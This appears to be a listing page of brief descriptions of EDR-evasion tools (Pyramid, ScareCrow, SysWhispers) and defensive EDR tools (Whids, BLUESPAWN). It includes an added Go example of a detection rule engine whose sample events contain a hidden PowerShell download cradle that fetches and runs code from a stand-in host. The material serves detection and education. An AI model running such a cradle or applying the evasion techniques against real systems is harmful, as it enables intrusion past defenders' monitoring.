Pyramid : A Tool To Help Operate In EDRs’ Blind Spots

Pyramid is a set of Python scripts and module dependencies that can be used to evade EDRs. The main purpose of the tool is to perform offensive tasks by leveraging some Python evasion properties while looking like legitimate Python application usage. This can be achieved because: For more information please check the DEFCON30 – …

Whids : Open Source EDR For Windows

Whids is an Open Source EDR for Windows with artifact collection driven by detection. The detection engine is built on top of a previous project, Gene, specifically designed to match Windows events against user-defined rules. What do you mean by “artifact collection driven by detection”? It means that an alert can directly trigger …
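To make the "artifact collection driven by detection" idea concrete, here is an added illustration (not Whids or Gene code, and not Gene's actual rule syntax): a minimal rule engine that matches flattened Windows events against AND-ed conditions, and when a rule fires, the rule's own action list decides which artifacts get collected for the offending process. The rule, the event field names (`EventID`, `Image`, `CommandLine`, `ProcessId`), the operators and the sample events are all constructed for this example; real Whids rules and Sysmon/ETW records differ in shape.

```go
package main

import (
	"fmt"
	"strings"
)

// Event is a flattened Windows event. Field names mimic Sysmon process-creation
// records but are constructed for this example only.
type Event map[string]string

// Condition is one field test inside a rule, e.g. Image endswith "\powershell.exe".
// The operator set (eq, contains, endswith) is an assumption of this example.
type Condition struct {
	Field, Op, Value string
}

// Rule is a named set of AND-ed conditions plus the collection actions to run
// when it fires. Coupling actions to the rule is what makes collection
// "driven by detection": no match, no collection.
type Rule struct {
	Name       string
	Conditions []Condition
	Actions    []string
}

// Alert pairs a matched rule with the event that triggered it.
type Alert struct {
	Rule  Rule
	Event Event
}

func (c Condition) matches(ev Event) bool {
	v, ok := ev[c.Field]
	if !ok {
		return false
	}
	switch c.Op {
	case "eq":
		return strings.EqualFold(v, c.Value)
	case "contains":
		return strings.Contains(strings.ToLower(v), strings.ToLower(c.Value))
	case "endswith":
		return strings.HasSuffix(strings.ToLower(v), strings.ToLower(c.Value))
	}
	return false
}

// Evaluate runs every rule against one event; every condition must hold.
func Evaluate(rules []Rule, ev Event) []Alert {
	var alerts []Alert
	for _, r := range rules {
		hit := len(r.Conditions) > 0
		for _, c := range r.Conditions {
			if !c.matches(ev) {
				hit = false
				break
			}
		}
		if hit {
			alerts = append(alerts, Alert{Rule: r, Event: ev})
		}
	}
	return alerts
}

// Collect maps an alert's actions to artifact descriptors. A real EDR would
// dump process memory or copy the binary; here we only record what would be taken.
func Collect(a Alert) []string {
	var artifacts []string
	for _, act := range a.Rule.Actions {
		switch act {
		case "memdump":
			artifacts = append(artifacts, "memdump:pid="+a.Event["ProcessId"])
		case "filedump":
			artifacts = append(artifacts, "filedump:"+a.Event["Image"])
		case "report":
			artifacts = append(artifacts, "report:"+a.Rule.Name)
		}
	}
	return artifacts
}

// RunPipeline feeds events through the rules and returns collected artifacts per rule.
func RunPipeline(rules []Rule, events []Event) map[string][]string {
	collected := map[string][]string{}
	for _, ev := range events {
		for _, a := range Evaluate(rules, ev) {
			collected[a.Rule.Name] = append(collected[a.Rule.Name], Collect(a)...)
		}
	}
	return collected
}

// SampleRules and SampleEvents are constructed test data, not real telemetry.
var SampleRules = []Rule{{
	Name: "PowerShellDownloadCradle",
	Conditions: []Condition{
		{"EventID", "eq", "1"},
		{"Image", "endswith", `\powershell.exe`},
		{"CommandLine", "contains", "DownloadString"},
	},
	Actions: []string{"memdump", "report"},
}}

var SampleEvents = []Event{
	{"EventID": "1", "ProcessId": "1200", "Image": `C:\Windows\explorer.exe`, "CommandLine": "explorer.exe"},
	{"EventID": "1", "ProcessId": "4300", "Image": `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`, "CommandLine": `powershell.exe -File C:\scripts\backup.ps1`},
	{"EventID": "1", "ProcessId": "4242", "Image": `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe`, "CommandLine": `powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"`},
}

func main() {
	for name, arts := range RunPipeline(SampleRules, SampleEvents) {
		fmt.Println(name, arts)
	}
}
```

Only the third event satisfies all three conditions, so only PID 4242 gets a memory dump queued and a report emitted; the benign PowerShell invocation with the same image path produces nothing, which is the point of tying collection to a full rule match rather than to a single indicator.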

ScareCrow : Payload Creation Framework Designed Around EDR Bypass

ScareCrow is a payload creation framework for generating loaders for use in side-loading (not injection) into a legitimate Windows process (bypassing Application Whitelisting controls). Once the DLL loader is loaded into memory, it uses a technique to flush an EDR’s hooks out of the system DLLs running in the process’s memory. This works because we …

SysWhispers : AV/EDR Evasion Via Direct System Calls

SysWhispers helps with evasion by generating header/ASM files that implants can use to make direct system calls. All core syscalls are supported from Windows XP to 10. Example generated files are available in example-output/. Various security products place hooks in user-mode APIs, which allow them to redirect execution flow to their engines and detect suspicious behavior. …

BLUESPAWN : Windows-Based Active Defense & EDR Tool To Empower Blue Teams

BLUESPAWN helps blue teams monitor Windows systems in real time against active attackers by detecting anomalous activity. We’ve created and open-sourced this for a number of reasons, which include the following: Move Faster: We wanted tooling specifically designed to quickly identify malicious activity on a system. Know our Coverage: We wanted to know exactly what our …